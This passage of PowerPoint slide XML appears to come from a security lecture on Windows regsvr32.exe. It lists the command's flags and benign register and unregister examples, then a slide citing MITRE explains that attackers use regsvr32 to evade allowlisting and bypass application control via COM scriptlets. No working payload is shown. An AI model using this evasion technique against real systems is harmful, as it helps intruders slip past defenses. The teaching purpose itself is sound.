              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t> - Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DllInstall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t> passing it an optional [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmdline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t>]; when it is used with </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t>, it calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" err="1"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uninstall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t> - do not call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DllRegisterServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t>; this option must be used with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t> – Silent; display no message boxes</a:t>
            </a:r>
          </a:p>
          <a:p>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40</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Syntax </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41501219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7545" y="2675467"/>
            <a:ext cx="8352928" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>registering a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>file: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32 shmedia.dll </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>unregistering a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>file: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/u shmedia.dll </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> shell32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>practically saying "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Please register the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file for me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>". </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>internally calls the DLLs' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DllInstall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> function, and the DLL is registered again.</a:t>
            </a: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41</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Usage of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Wikipedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>OVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1511913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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Malicious usage of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>may avoid triggering security tools that may not monitor execution of, and modules loaded by, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>because of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>allowlists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or false positives from Windows using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>for normal operations. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>can also be used to specifically bypass application control using functionality to load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>COM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>scriptlets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DLLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> under user permissions.</a:t>
            </a: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42</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Why Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regsvr32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> to Launch Attacks? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>MITRE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25889519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2675467"/>
            <a:ext cx="8856984" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>當該惡意程式下載到系統上時，系統登錄當中就會出現以下機碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
